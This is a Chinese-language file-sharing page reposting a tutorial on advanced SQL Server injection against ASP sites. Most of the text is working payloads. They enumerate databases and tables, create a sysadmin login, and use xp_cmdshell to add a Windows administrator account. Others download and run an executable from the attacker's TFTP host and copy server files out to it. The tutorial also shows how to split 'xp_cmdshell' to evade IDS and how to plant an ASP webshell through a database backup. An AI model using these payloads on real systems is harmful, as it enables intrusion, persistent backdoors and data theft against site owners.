SQLSERVER高级注入技巧

《SQLSERVER高级注入技巧》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、SQLSERVER高级注入技巧高级技巧，其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入，建议大家看看本站的SQL语法相关文章[获取全部数据库名]selectnamefrommaster.dbo.sysdatabaseswheredbid=7//dbid的值为7以上都是用户数据库[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]selecttop1namefrom数据库名.dbo.sysobjectswherextype=’u’andstatus>0andnamenotin(’table’)[获得

2、数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]selecttop1数据库名.dbo.col_name(object_id(’要查询的数据表名’),字段列如:1)[where条件]通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]news.asp?id=2;execmaster.dbo.sp_addlogintest,test;--//添加数据库用户用户test,密码为testnews.asp?id=2;execmaster.dbo.sp_passwordtest,1234

3、56,test;--//如果想改密码，则用这句（将test的密码改为123456）news.asp?id=2;execmaster.dbo.sp_addsrvrolemembertest,sysadmin;--//将test加到sysadmin组,这个组的成员可执行任何操作news.asp?id=2;execmaster.dbo.xp_cmdshell’netusertesttest/add’;--//添加系统用户test,密码为testnews.asp?id=2;execmaster.dbo.xp_cmdshell’netlocalgroupadm

4、inistratorstest/add’;--//将系统用户test提升为管理员这样，你在他的数据库和系统内都留下了test管理员账号了下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为TFTP服务器，将69端口打开]id=2;execmaster.dbo.xp_cmdshell’tftp–i你的IPgetfile.exe’;--然后运行这个文件：id=2;execmaster.dbo.xp_cmdshell’file.exe’;--下载服务器的文件file2.doc到本地TFTP服务器[文件必须存在]:id=2;exe

5、cmaster.dbo.xp_cmdshell’tftp–i你的IPPutfile2.doc’;--绕过IDS的检测[使用变量]declare@asysnameset@a=’xp_’+’cmdshell’exec@a’dirc:’declare@asysnameset@a=’xp’+’_cm’+’dshell’exec@a’dirc:’新加的：建一个表。只有一个字段，类型为image,将asp内容写入。导出数据库为文件backupdatabasedbnametodisk=’d:webdb.asp’;报错得到系统操作系统和数据库系统版本号id=

6、2and1<>(select@@VERSION);